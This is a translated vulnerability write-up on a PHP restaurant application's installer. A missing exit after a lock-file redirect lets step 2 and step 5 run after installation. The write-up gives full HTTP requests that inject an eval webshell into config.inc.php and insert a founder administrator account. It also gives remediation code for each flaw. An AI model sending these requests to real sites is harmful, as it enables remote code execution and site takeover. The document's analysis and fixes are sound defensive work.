The problem lies in /install/index.php. After the program has been installed, an install.lock file is generated in the program's root directory, but /install/index.php gets the check for install.lock wrong.
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");// no exit() here
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
As can be seen, when install.lock exists, header() only issues a 302 redirect and never exits, which means the logic below still runs. At least two vulnerabilities follow from this.
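The fix for the defect just described is to terminate the request after the redirect. The following is an added example, not the application's own code; the function names are mine, and it assumes the file lives in /install/ with install.lock in the application root, as the write-up states.

```php
<?php
// Added example, not the application's own code: the lock-file check at the
// top of /install/index.php rewritten so that the redirect ends the request.
// Assumption: this file lives in /install/ and install.lock is written to the
// application root.

/**
 * Returns true when installation has already completed.
 * is_file() rather than file_exists(): a directory named install.lock must
 * not count as a lock.
 */
function install_is_locked(string $lockFile): bool
{
    return is_file($lockFile);
}

/**
 * Stops the installer when the lock exists. header() only queues a response
 * header; PHP keeps executing the rest of the script unless we exit, which is
 * exactly the defect in the original. exit() after header() is the whole fix.
 */
function enforce_install_lock(string $lockFile): void
{
    if (install_is_locked($lockFile)) {
        header('Location: ../', true, 302);
        exit();
    }
}

enforce_install_lock(__DIR__ . '/../install.lock');
// Nothing below this line runs on an installed system.
require_once __DIR__ . '/init.php';
```

Every later step (2, 5, ...) should go through the same guard rather than rely on the top-of-file check alone, and the stronger control is to delete the /install directory entirely once installation has finished, so there is no installer left to reach.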
1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);// note: == is a comparison, so $domain is never assigned
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);// writes the submitted data into a PHP file
The code above writes the POSTed data straight into ../config/config.inc.php, so by submitting the following POST request we obtain a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
But this method is very dangerous: it leaves the site unable to run.
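The root cause of the getshell is that request values are concatenated into PHP source. The following added example (not the application's own code; the function names and validation rules are mine) generates the config file with var_export(), so every value becomes a properly quoted PHP string literal, and it shows that the payload from the request above ends up as an inert string.

```php
<?php
// Added example, not the application's own code: generate config.inc.php
// without interpolating raw request data into PHP source.

/**
 * Build the configuration file body. var_export() emits each value as a
 * quoted, escaped PHP string literal, so a value such as
 *   test");@eval($_POST[x]);?>//
 * cannot terminate the string or the define() call.
 */
function build_config_php(array $values): string
{
    $allowed = ['MYSQL_HOST', 'MYSQL_USER', 'MYSQL_PWD', 'MYSQL_DB', 'TABLE_PRE', 'DOMAIN'];
    $out = "<?php\n";
    foreach ($allowed as $name) {
        $value = (string)($values[$name] ?? '');
        $out .= 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ");\n";
    }
    $out .= "define('MYSQL_CHARSET', 'GBK');\n";
    $out .= "define('SKINS', 'default');\n";
    return $out; // no closing ?> tag, so nothing after it can leak into output
}

/** The table prefix ends up inside SQL identifiers: allow only identifier characters. */
function valid_table_prefix(string $prefix): bool
{
    return (bool)preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix);
}

/** Host, user, database and domain: bounded length, no control characters. */
function valid_plain_value(string $value): bool
{
    return $value !== '' && strlen($value) <= 255 && !preg_match('/[\x00-\x1f\x7f]/', $value);
}

/**
 * Validate, then write the file with an exclusive lock. Returns false when
 * any value is rejected; nothing is written in that case.
 */
function write_config_file(string $path, array $values): bool
{
    foreach (['MYSQL_HOST', 'MYSQL_USER', 'MYSQL_DB', 'DOMAIN'] as $name) {
        if (!valid_plain_value((string)($values[$name] ?? ''))) {
            return false;
        }
    }
    if (!valid_table_prefix((string)($values['TABLE_PRE'] ?? ''))) {
        return false;
    }
    return file_put_contents($path, build_config_php($values), LOCK_EX) !== false;
}

// Constructed input reusing the payload from the request above: the output
// line reads  define('MYSQL_HOST', 'test");@eval($_POST[x]);?>//');  and the
// value stays a plain string when the file is later included.
$constructed = [
    'MYSQL_HOST' => 'test");@eval($_POST[x]);?>//',
    'MYSQL_USER' => '1',
    'MYSQL_PWD'  => '2',
    'MYSQL_DB'   => '3',
    'TABLE_PRE'  => 'koufu_',
    'DOMAIN'     => 'www',
];
echo build_config_php($constructed);
```

Escaping is the second line of defence here; the first is that step 2 must never be reachable once install.lock exists, and the generated file should be written outside the web root or protected from direct requests.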
2. Add an administrator directly
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";// no exit() here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");// an administrator can be inserted directly
    }
With this we can directly insert an administrator account qingshen/qingshen; the request is as follows:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
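Step 5 has three separate problems: it runs on an installed system, the password-mismatch branch does not exit, and $adminname is interpolated into the INSERT. The following added example (not the application's own code; function names, the identifier rules and the use of password_hash() in place of the application's umd5() are my assumptions) addresses all three with a lock check, early returns and a bound parameter on a mysqli prepared statement.

```php
<?php
// Added example, not the application's own code: step-5 administrator creation
// rewritten so that validation failures stop processing and the INSERT binds
// its values instead of interpolating them.
// Assumptions: an open mysqli connection, install.lock in the application root
// as in the write-up, and password_hash() instead of the original umd5().

/** Returns an error message, or null when the input is acceptable. */
function validate_admin_input(string $adminname, string $pwd1, string $pwd2): ?string
{
    if ($adminname === '') {
        return 'administrator name must not be empty';
    }
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $adminname)) {
        return 'administrator name must be 3-32 letters, digits or underscores';
    }
    if ($pwd1 === '' || $pwd1 !== $pwd2) {
        return 'the two passwords do not match';
    }
    return null;
}

/**
 * Inserts the founder account. Returns false without touching the database
 * when installation is already locked, input is invalid, or the table prefix
 * is not a plain identifier (identifiers cannot be bound, hence the check).
 */
function create_founder_admin(mysqli $db, string $tablePrefix, string $adminname, string $pwd1, string $pwd2): bool
{
    if (is_file(__DIR__ . '/../install.lock')) {
        return false; // independent of the redirect at the top of the script
    }
    if (validate_admin_input($adminname, $pwd1, $pwd2) !== null) {
        return false;
    }
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $tablePrefix)) {
        return false;
    }
    $hash = password_hash($pwd1, PASSWORD_DEFAULT);
    $stmt = $db->prepare("INSERT INTO `{$tablePrefix}admin` (adminname, password, isfounder) VALUES (?, ?, 1)");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ss', $adminname, $hash);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Request handling for step 5: every failure path ends the request.
$adminname = trim($_POST['adminname'] ?? '');
$pwd1 = trim($_POST['pwd1'] ?? '');
$pwd2 = trim($_POST['pwd2'] ?? '');
$error = validate_admin_input($adminname, $pwd1, $pwd2);
if ($error !== null) {
    http_response_code(400);
    echo htmlspecialchars($error, ENT_QUOTES, 'UTF-8');
    exit();
}
// then: create_founder_admin($db, TABLE_PRE, $adminname, $pwd1, $pwd2)
// and, on success, write install.lock before reporting completion.
```

The original's alert-and-history.go(-1) pattern is the tell: output sent to the browser is not control flow, and any branch that reports an error must also stop the script, otherwise the INSERT below it still executes.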